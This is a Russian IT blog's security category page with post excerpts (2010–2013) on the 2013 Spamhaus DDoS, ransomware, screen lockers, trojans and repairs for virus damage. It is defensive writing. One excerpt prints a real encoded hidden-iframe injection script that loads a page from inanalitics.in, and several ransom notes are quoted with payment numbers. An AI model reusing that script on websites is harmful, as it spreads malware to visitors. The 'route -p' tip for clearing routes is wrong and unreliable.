Безопасность

Подписаться на эту рубрику по RSS

Крупнейшая DDoS-атака в истории

Март, 28th 2013

DDoS-атака

Заметили падение скорости интернет в пару последних дней? Сегодня многие интернет издания и крупные СМИ рассказали о «крупнейшей DDoS-атаке в истории интернета». Пришлось ощутить эти тормоза в полной мере на одном из серверов, пока временно не прикрыли на нем открытый DNS снаружи.

Основной жертвой атаки стала компания Spamhaus, которая занесла в чёрный список голландского хостинг-провайдера Cyberbunker за рассылку спама. Хостер не простил этого и организовал мощный DDoS (впрочем сейчас утверждает, что сам стал жертвой хакеров).

DDoS-атака началась еще неделю назад и вчера ее мощность выросла до 300 Гбит/с, так что смело можно утверждать, что это самая мощная атака в истории интернета на данный момент. В общем, сейчас зачинщиков "ищут пожарные, ищет милиция...".

Честно говоря мне доводилось выводить из черных списков Spamhaus вполне себе мирные домены, которым просто "не повезло", когда MX записи их почтовиков указывали на забаненные этим самым Spamhaus сети, причем без разбора. С другой стороны, НУ КАК ЖЕ ЗАДРАЛ ЭТОТ СПАМ!!!

ВНИМАНИЕ! Новый вирус-шифровальщик

Декабрь, 20th 2012
КОРАБЛЬ НА ЯКОРЬ, ГОСПОДА!
Бонжур комрады ! Вэлком на борт нашей "Чёрной мамбы".
Ваш компьютер взят на абордаж
командой Зимбабвийских пиратов .
Ваши файлы зашифрованы нашим
морским криптографом Намбо Ваном.
Если вы, нежадный белый человек
и не психованный депутат из ЛДПР,
то, мы готовы обменять вашу драгоценную инфу,
на жалкие бумажки именуемые бабками.
Поверьте, бабло зло - отдайте его нам.
Алчных и неадекватных типов за борт.
Весёлым и находчивым скидки.
У вас три дня до отплытия корабля.
Для переговоров собираемся в кают компании, sos на мыло
Номер компании 00000100
KORSARS@POST.COM

Забавное сообщение? Это только на первый взгляд... новый вирус шифрует файлы (документы, изображения, mp3), после чего тело вируса удаляется с компьютера. И это уже приобретает масштаб эпидемии.

Вирус-шифровальщик, предположительно распространяется в почтовых сообщениях в виде исполняемого файла и, на данный момент, пропускается ВСЕМИ антивирусами! Во всяком случае ни Касперский, ни DrWeb ничего обнаружить не смогли. Конечно, вина лежит на самих пользователях, которые запускают всё без разбора, но факт остается фактом.

читать полностью →

Ваш ПК заблокирован за просмотр и распространение порнографии. Вирус MBRlock

Декабрь, 06th 2012
Ваш ПК заблокирован за просмотр и распространение порнографии с участием несовершеннолетних, элементами насилия, педофилии. Ваши действия квалифицированы в соответствии ст.132 УК РФ, на основании чего ваш компьютер был заблокирован. Ввиду незначительности преступления на Вас наложен штраф в размере 700 рублей. Для оплаты штрафа в любом терминале пополните счет абонента МТС 8 9172782237 на сумму 700 рублей. По завершении платежа в случае оплаты суммы, равной штрафу, на фискальном чеке терминала оплаты Вы найдете персональный код, после ввода которого Ваш ПК будет автоматически разблокирован. В случае неуплаты штрафа все данные на Вас и IP адрес будут переданы в органы правопорядка для расмотрения и возбуждения уголовного дела по ст.132 УК РФ. Впредь соблюдайте порядок поведения в сети интернет!

Enter code:

Вот такое, серьезное с виду, предупреждение высветилось на одном из компьютеров - хоть бы без ошибок писали, грамотеи. Отдельно хочется поблагодарить одного из ночных охранников офиса и пользователя, который не удосужился поставить пароль.

читать полностью →

Как удалить trojan.carberp.30 (klpclst.dat)

Сентябрь, 27th 2012

Мой маленький недельный отпуск закончился и работа вновь накрыла с головой. Даже столь небольшой промежуток времени был богат на события... ну да это совсем другая тема, которой посвящу один из ближайших постов.

Давненько ничего не писал о троянцах, так что встречайте нового героя - trojan.carberp.30. О Carberp я слышал только то, что он внедряется в популярные системы дистанционного банковского обслуживания, но вот попался данный экземпляр на вполне заурядном офисном компьютере.

Честно говоря, симптомы были странные, OpenOffice запускался через раз, вернее начинал стартовать только после чистки /temp/ каталога пользователя. При загрузке компьютера, DrWeb постоянно находил вирус и бережно складывал его в карантин.

Однако, полная проверка компьютера, к моему удивлению, ничего не выявила, хотя вирус продолжал упорно находиться после каждой перезагрузки.

читать полностью →

ping не является внутренней или внешней командой...

Июнь, 15th 2012

Поговорим о последствиях действий некоторых вирусов, приводящих, при запуске программ из командной строки, к ошибкам следующего плана:

ping не является внутренней или внешней командой, исполняемой программой или пакетным файлом

На месте ping, в командной строке, с таким же успехом может быть написана любая системная программа (ipconfig, tracert, regedit и т.д.). Честно говоря, о простом решении сразу не подумал и для начала решил накатить обновление SP3 на Windows XP. Результат был нулевым.

На самом деле всё гораздо проще - были изменены пути у системной переменной PATH. Эта переменная указывает системе, где искать программы соответствующие той или иной команде. Т.е. выполнить команду можно и без этого, но в противном случае пришлось бы писать полный путь до нужной программы.

читать полностью →

Как удалить Avast! с компьютера

Май, 17th 2012

Avast! был и остается довольно неплохим бесплатным антивирусом. Но по личному опыту, DrWeb с AVZ и здравым смыслом помогали решать любую проблему с зараженными машинами. Доказывать какая давилка вирусов лучше не стану, т.к. не участвую в "религиозных войнах", лучше расскажу об одном неприятном моменте, связанном с антивирусом Avast!

Разработчики Avast!, желая навечно поселить своё детище на вашем компьютере, решили не включать деинсталлер в пакет установки. В итоге, стандартными средствами, через Панель управления -> Удаление программ вы Avast! не удалите - его просто нет в списке установленных программ.

Такое поведение присуще скорее вирусам, а не программам, которые предназначены для борьбы с ними. Понимая, что так поступать не гоже, разработчики антивируса предлагают отдельную утилиту для удаления Avast! на своем сайте aswclear. Скачать её можно по этой ссылке:

http://www.avast.com/ru-ru/uninstall-utility

Теперь остается загрузить компьютер в безопасном режиме (нажать F8 перед стартом Windows) и запустить aswclear.exe. Процесс удаление происходит довольно быстро, хоть на этом спасибо.

Что делать, если не удаляется папка на Win7

Май, 10th 2012

не удаляется папка Windows

Жил-был один ноутбук Аcer aspire 5560G, на котором немного "пошуровали" вирусы. Итог был весьма печален - ноут напрочь отказывался устанавливать видеокарту. Как я только не бился, но режим 1024x768 был ему милее всего, а на драйвера плевать он хотел.

читать полностью →

Как разводят на деньги в соцсетях или поговорим немного о троянах

Март, 27th 2012

Мы обнаружили подозрительную активность и временно заморозили Вашу страницу

Мы обнаружили подозрительную активность и временно заморозили Вашу страницу, чтобы вырвать ее из рук злоумышленников.

Далее просят ввести номер телефона для подтверждения... и такого рода сообщения наблюдаются при входе в наиболее популярные соцсети - Одноклассники, Facebook, ВКонтакте и Skype. Наверняка в этот же список попал и твиттер, только владельцы компьютера, с которым приключилась беда им не пользуются, потому это лишь мое предположение.

Такое поведение явно указывает на наличие вируса на компьютере. Налицо банальная переадресация запросов на сайты злоумышленников, полностью повторяющих дизайн и оформление известных соцсетей. Это и есть классический троян.

читать полностью →

Аппетиты вирусов-вымогателей растут

Январь, 15th 2012

На страницах блога я уже не раз писал о вирусах-вымогателях - началось всё с вируса Internet Security два года назад. Потому не буду переливать из пустого в порожнее и в очередной раз подробно и в деталях рассказывать о лечении.

Однако аппетиты у них растут, конечно не у самих вирусов, а их владельцев. Очередной такой любитель быстрой наживы требует 1000 рублей за код разблокировки... действительно, чего мелочиться то.

Windows ЗАБЛОКИРОВАН. Вирус Microsoft Security  Essentials

Внимание! Вопрос к тем, кто всё ещё отправляет деньги - действительно код приходит? Впрочем, те кто читает этот пост, вряд-ли дадут ответ...

читать полностью →

Компьютер заблокирован! Windows 7

Июнь, 23rd 2011

В предыдущей статье я рассказал как избавиться от нового вируса-вымогателя, блокирующего компьютер на Windows XP. Буквально сегодня принесли ноутбук с таким-же вирусом, правда у этого аппетиты скромнее - просит не 500, а 400 рублей так называемых "штрафов".

Собственно, под Windows 7 действие вируса немного проще. По всей видимости в семерке переписать файл в системной папке C:\Windows\system32 ему не под силу. В результате алгоритм лечения немного изменился.

читать полностью →

Компьютер заблокирован! Новый вариант вымогателей

Июнь, 21st 2011

Компьютер заблокирован

Ваш компьютер заблокирован за посмотр, копирование и тиражирование видеоматериалов содержащих элементы педофилии и насилия над детьми. Для снятия блокировки Вам необходимо оплатить штраф в размере 500 рублей на номер Билайн 8-909-151-56-52. В случае оплаты суммы равной штрафу либо превышающей ее на фискальном чеке терминала буде напечатан код разблокировки. Его нужно ввести в поле в нижней чати окна и нажать кнопку "Разблокировать". После снятия блокироки Вы должны удалить все материалы содержащие элементы насилия и педофилии. Если в течении 12 часов штраф не будет оплачен, все данные на Вашем компьютере будут безвозвратно удалены, а дело будет передано в суд для разбирательства по статье 242 ч.1 УК РФ.
Перезагрузка или выключение компьютера приведет к незамедлительному удалению ВСЕХ данных, включая код операционной системы и BIOS, с невозможностью дальнейшего восстановления.

Буквально за пару дней поступило несколько пациентов с подобыми симптомами. С Первого взгляда ничего особенного - обычный блокиратор, уже не раз писал о них в разделе вирусология. Однако этот тип немного отличается от описанных ранее, например Internet Security и отличие это поганенькое.

Данный вымогатель заменяет собой системый файл userinit.exe, находящийся в каталоге C:\WINDOWS\system32\, чего не замечалось за его предшественниками.

читать полностью →

Как найти вирус на сайте

Декабрь, 25th 2010

Вирусный код с сайта:

<script language=JavaScript>
jhtm='%3Ciframe%20src%3D%22http%3A//inanalitics.in/inc/top/iframe.php%22
%20width%3D1%20height%3D1%20style%3D%22visibility%3A%20hidden%22%3E%3C
/iframe%3E';crypo=unescape(jhtm);document.write(crypo);
</script>

Не так давно меня попросили разобраться с одним сайтом. Яндекс пометил его как распростаняющий вирусы, о чем выдавал информацию сразу после ссылки на сайт, да и антивирусы, способные фильтровать интернет-трафик, также ругаются на такие сайты.

Действительно, вирусы, написанные для сайтов, набирают популярность. Но надо понимать, что большинстве случаев, сам вирус находится на компьютере, имеющем ftp доступ к сайту. Принцип действия примерно следующий - вирус незаметно для пользователя крадёт пароли от ftp, подключается и вставляет в скрипты сайта паразитный код.

читать полностью →

Не открываются сайты антивирусов

Октябрь, 30th 2010

Встретился тут один троян, запомнися тем, что проявил своё присутствие довольно интересным способом, а именно при попытке открыть любой сайт разработчиков антивирусов - DrWeb, Kaspersky, NOD32 и т.д., браузер сообщал, что такой ресурс не существут. Соотвественно ни о каких обновлениях, установленого антивирусного пакета, речь тоже не идет.

После благополучного лечения компьютера от вирусов, ситуация не меняется. В чем дело? Всё просто - вирь переписывает таблицу маршрутизации. Устраняется такая ситуация довольно просто. В командной строке (Пуск -> Выполнить -> ввести cmd) необходимо написать следующее:

route -p

Данная команда с параметром -p очищает таблицу маршрутизации от всех записей, которые не являются узловыми маршрутами (маршруты с маской подсети 255.255.255.255), сетевым маршрутом замыкания на себя (маршруты с конечной точкой 127.0.0.0 и маской подсети 255.0.0.0) или маршрутом многоадресной рассылки (маршруты с конечной точкой 224.0.0.0 и маской подсети 240.0.0.0).

После желательно перезагрузить компьютер. Заодно проверьте не прописан ли у вас в браузере прокси-сервер (если вы его не используете) и содержимое файла C:\Windows\System32\drivers\etc\hosts на наличие лишних записей.

Ваш компьютер заблокирован за рассылку спама

Октябрь, 09th 2010

internet security Ваш компьютер заблокирован за рассылку спама

На днях столкнулся с очередным вымогателем, по традиции маскирующийся под систему безопасности Internet Security (ну хоть бы название какое иное выдумали). На этот раз назвать данное творение вирусом язык не поворачивается, хотя обычному пользователю нервов потратить может массу. Особенно актуально для любителей социальной сети ВКОНТАКТЕ. Каюсь, сам по началу не мог понять в чем дело.

Суть действий - при попытке просмотра любого сайта, вместо ожидаемой странички вылазит картинка следующего содержания:

Internet Security Запрашиваемый URL адрес не может быть предоставлен. Ваш компьютер заблокирован за рассылку спама. Вы можете разблокировать свой компьютер, для этого перейдите на сайт ВКонтакте и активируйте свою анкету. После чего Вы сможе пользоваться всей сетью.

Итак, как таковым вирусом данный вымогатель не является. Он изменяет файл:

C:\Windows\System32\drivers\etc\hosts

читать полностью →

Пропал звук в Интернет. Flash без звука или setupapi.dll

Октябрь, 03rd 2010

Сегодня попросили решить такую проблему - при просмотре любого видео в Интернет, например с YouTube, изображение идет без сопровождения звука. Причем на самом компьютере звук есть - музыка, фильмы, игры идут без проблем со звуком. Проблема не решается не переустановкой flash плейера, не сменой браузера. Более того IE вообще отказывается запускаться.

Виновником такого поведения оказался вирус. Куда копать подсказал браузер Opera, выдав сообщение об ошибке при обращении к библиотеке setupapi.dll. Как известно, в каждой Windows системе есть системная библиотека C:/Windows/system32/setupapi.dll. Под неё и маскируется вирус, копируя себя в папки всех установленых браузеров с таким именем.

Чтобы восстановить нормальное воспроизведение видео со звуком в Internet достаточно удалить с компьютера все файлы setupapi.dll, кроме C:/Windows/system32/setupapi.dll. Найти их можно поиском, не забыв включить в него скрытые и системные файлы.

После всё же рекомендую проверить компьютер свежим антивирусом. Обычно единственным вирусом дело не обходится. Flash player кстати можно не переставлять.

Вместо рабочего стола Windows загружается проводник!

Сентябрь, 02nd 2010

восстановление работы Windows

В продолжение серии статей о вирусах и последствиях борьбы с ними, хочу рассказать что делать, если вместо рабочего стола Windows вы видите пустой экран или загружается проводник. Рассмотрим случай, когда после загрузки видим пустой рабочий стол, без меню «Пуск», значков и вообще всего нажитого непосильным трудом – одни обои, если они были.

читать полностью →

Синий экран смерти (BSOD) и причём тут DrWeb?

Август, 30th 2010

BSOD

Сегодняшний день начался крайне неудачно - на нескольких рабочих станциях во время загрузки появился синий экран смерти (BSOD). Перезагрузка проблему не решала. Видимо мне повезло ощутить на себе действие пословицы про тяжелый день понедельник.

читать полностью →

Диспетчер задач отключен администратором. Win32.Sector.21

Август, 25th 2010

Диспетчер задач отключен администратором

В своих заметках, я уже не раз рассказывал о том, как исправить блокировки компьютера (диспетчер задач, редактор реестра) посредством утилиты AVZ. Сегодня хочу немного приоткрыть тайну, как это сделать простым редактированием реестра.

Для начала требуется загрузиться с LiveCD, флешки с WinPE, подсоединить винчестер к другому компьютеру - в общем главное, не грузиться с него самого, т.к. смысла в этом никакого. Далее запускаете редактор реестра, подключаем к нему необходимую нам ветку HKEY_CURRENT_USER. Данной ветке реестра соответствует файл NTUSER.DAT в соответствующем каталоге пользователя.

Избавляемся от блокировки диспетчера задач

Изменяем значение параметра DisableTaskMgr в разделе [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] со значения 1 на 0, либо вообще удаляем данный параметр.

В паре с этим параметром в 99% случаях там же вы найдете параметр DisableRegistryTools, отключающий редактор реестра. Соответственно меняете его значение на 0 или удаляете.

читать полностью →

Новая волна блокираторов. Вирус PC Defender

Август, 17th 2010

Вирус-вымогатель PC Defender. Похоже тема блокираторов ещё не закончилась. Сегодня принесли сразу 2 ноутбука с одинаковой заразой - на этот раз блокиратор маскируется под антивирус с названием PC Defender. В сети я не раз сталкивался с сайтами, где станички были оформлены в подобном стиле и пользователю показывалась картинка в точности воспроизводящая действия антивируса. Естественно показывалось множество "зараженых" файлов.

К блокираторам Windows с не совсем одетыми девушками уже думаю все привыкли, на смену им идут более изощренные - теперь на вашем компьютере якобы найдено множество вирусов и угроз безопасности, чтобы избавиться, нужно всего навсего отправить SMS (ну куда без них) и счастливец получает полнофункциональную антивирусную защиту.

читать полностью →

Новый блокиратор Online Antivirus

Февраль, 19th 2010

Online Antivirus

Внимание! Онлайн проверка показала, что в Вашей системе обнаружен вредоносный вирус, который постепенно заражает все файлы на Вашем компьютере. Вирус временно заблокирован, но его алгоритм шифрования постоянно меняется и остановить его на данный момент не имея этой программы не представляется возможным. Для того, чтобы удалить вредоносный вирус, необходимо узнать каков на данный момент у вируса алгоритм шифрования, для этого необходимо отправить смс на короткий номер 5121 с текстом 6625025. После того как Вы отправите смс, вам моментально будет выслан ключ, отключающий вирус. Введите этот ключ, и программа полностью удалит вирус с Вашего компьютера.

Алгоритм шифрования вируса сменится через 218 секунд.

(по истечению этого времени настоятельно рекомендуется удалить его)

Введите полученный вами ключ в это поле:

Удалить

*Программа блокирует все доступные способы входа в Windows, так как если не удалить зловредный вирус ВСЕ файла на вашем компьютере очень скоро будут заражены. Внимание: переустановка виндовс не изменит ситуацию, так как вирус прописывает себя в загрузочные сектора жесткого диска.

Собственно вот и новый вымогатель нарисовался Online Antivirus - интересно долго ещё терпеть подобное придется? У людей прямо направление бизнеса наметилось. Не пора-ли эти лохотроны объявлять вне закона? Мы тут все последствия лечим, а надо корень зла убивать - платные SMS на короткие номера. Достали уже...

читать полностью →